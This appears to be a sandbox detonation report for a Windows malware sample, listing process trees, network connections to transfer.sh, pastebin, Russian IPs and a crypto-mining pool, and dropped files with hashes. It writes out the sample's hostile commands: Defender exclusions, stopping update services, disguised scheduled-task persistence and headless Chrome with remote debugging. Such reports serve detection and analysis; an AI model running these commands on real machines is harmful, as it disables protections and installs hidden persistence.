PID 4456 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3388 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3388 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 2992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 2992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 4280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 4280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe

"C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=33616 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data6FGCV" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data6FGCV" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data6FGCV\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data6FGCV" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa71f69758,0x7ffa71f69768,0x7ffa71f69778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1244 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1552 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=33616 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1872 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=33616 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1720 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=33616 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2108 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=33616 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2972 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=33616 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3160 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=33616 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3292 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=3520 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x3cc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 296

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#ablowysowmhywqfdn#> powershell <#ablowysowmhywqfdn#> -Verb <#ablowysowmhywqfdn#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 14:06 /f /tn MicrosoftEdgeTask_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 14:06 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
PL 51.83.170.21:19447 tcp
US 8.8.8.8:53 21.170.83.51.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
DE 172.217.23.214:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 214.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
NL 142.251.36.14:443 play.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 194.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.39.98:443 googleads.g.doubleclick.net tcp
NL 142.251.39.98:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 98.39.251.142.in-addr.arpa udp
DE 172.217.23.214:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 80.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.159.129.168:80 tcp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
N/A 127.0.0.1:33616 tcp
N/A 127.0.0.1:33616 tcp
N/A 127.0.0.1:33616 tcp
N/A 127.0.0.1:33616 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:80 pastebin.com tcp
US 172.67.34.170:443 pastebin.com tcp
RU 46.29.235.84:80 46.29.235.84 tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 84.235.29.46.in-addr.arpa udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 126.130.241.8.in-addr.arpa udp

Files

memory/2684-122-0x0000000001C10000-0x0000000001C39000-memory.dmp

memory/2684-123-0x0000000001C40000-0x0000000001C7F000-memory.dmp

memory/2684-124-0x0000000000400000-0x00000000018CF000-memory.dmp

memory/2684-125-0x00000000036B0000-0x00000000036E8000-memory.dmp

memory/2684-126-0x0000000073290000-0x000000007397E000-memory.dmp

memory/2684-127-0x00000000061A0000-0x00000000061B0000-memory.dmp

memory/2684-128-0x00000000061A0000-0x00000000061B0000-memory.dmp

memory/2684-129-0x00000000061B0000-0x00000000066AE000-memory.dmp

memory/2684-130-0x0000000003970000-0x00000000039A4000-memory.dmp

memory/2684-131-0x0000000003850000-0x0000000003856000-memory.dmp

memory/2684-132-0x00000000066B0000-0x0000000006CB6000-memory.dmp

memory/2684-133-0x0000000006CC0000-0x0000000006DCA000-memory.dmp

memory/2684-135-0x00000000061A0000-0x00000000061B0000-memory.dmp

memory/2684-134-0x0000000003A90000-0x0000000003AA2000-memory.dmp

memory/2684-136-0x00000000060F0000-0x000000000612E000-memory.dmp

memory/2684-137-0x0000000006150000-0x000000000619B000-memory.dmp

memory/2684-138-0x0000000000400000-0x00000000018CF000-memory.dmp

memory/2684-139-0x0000000001C10000-0x0000000001C39000-memory.dmp

memory/2684-140-0x0000000001C40000-0x0000000001C7F000-memory.dmp

memory/2684-141-0x0000000073290000-0x000000007397E000-memory.dmp

memory/2684-142-0x0000000006EC0000-0x0000000006F36000-memory.dmp

memory/2684-143-0x0000000006F40000-0x0000000006FD2000-memory.dmp

memory/2684-144-0x00000000070E0000-0x0000000007146000-memory.dmp

memory/2684-145-0x0000000007A20000-0x0000000007A70000-memory.dmp

memory/2684-146-0x0000000007AC0000-0x0000000007C82000-memory.dmp

memory/2684-147-0x0000000007C90000-0x00000000081BC000-memory.dmp

memory/2684-148-0x00000000061A0000-0x00000000061B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/3164-160-0x0000000000BC0000-0x0000000000E4B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/3388-167-0x0000000000810000-0x0000000000E44000-memory.dmp

memory/3388-169-0x0000000077204000-0x0000000077205000-memory.dmp

memory/3388-173-0x0000000000810000-0x0000000000E44000-memory.dmp

memory/2684-171-0x0000000000400000-0x00000000018CF000-memory.dmp

memory/3388-174-0x0000000003900000-0x0000000003970000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

memory/2684-178-0x0000000073290000-0x000000007397E000-memory.dmp

memory/3388-177-0x0000000006350000-0x00000000063BC000-memory.dmp

memory/2064-180-0x00007FF7E0940000-0x00007FF7E1BA5000-memory.dmp

memory/3388-182-0x00000000064C0000-0x00000000064D0000-memory.dmp

memory/2064-179-0x00007FF7E0940000-0x00007FF7E1BA5000-memory.dmp

memory/3388-185-0x00000000064C0000-0x00000000064D0000-memory.dmp

memory/3388-184-0x0000000006580000-0x00000000065A2000-memory.dmp

memory/2064-183-0x00007FFA7F410000-0x00007FFA7F5EB000-memory.dmp

memory/3388-181-0x00000000064D0000-0x0000000006582000-memory.dmp

memory/3388-186-0x00000000064C0000-0x00000000064D0000-memory.dmp

memory/3388-187-0x00000000064C0000-0x00000000064D0000-memory.dmp

memory/3388-188-0x00000000065B0000-0x0000000006900000-memory.dmp

memory/3388-189-0x0000000073290000-0x000000007397E000-memory.dmp

memory/2064-190-0x00007FF7E0940000-0x00007FF7E1BA5000-memory.dmp

memory/2064-215-0x00007FF7E0940000-0x00007FF7E1BA5000-memory.dmp

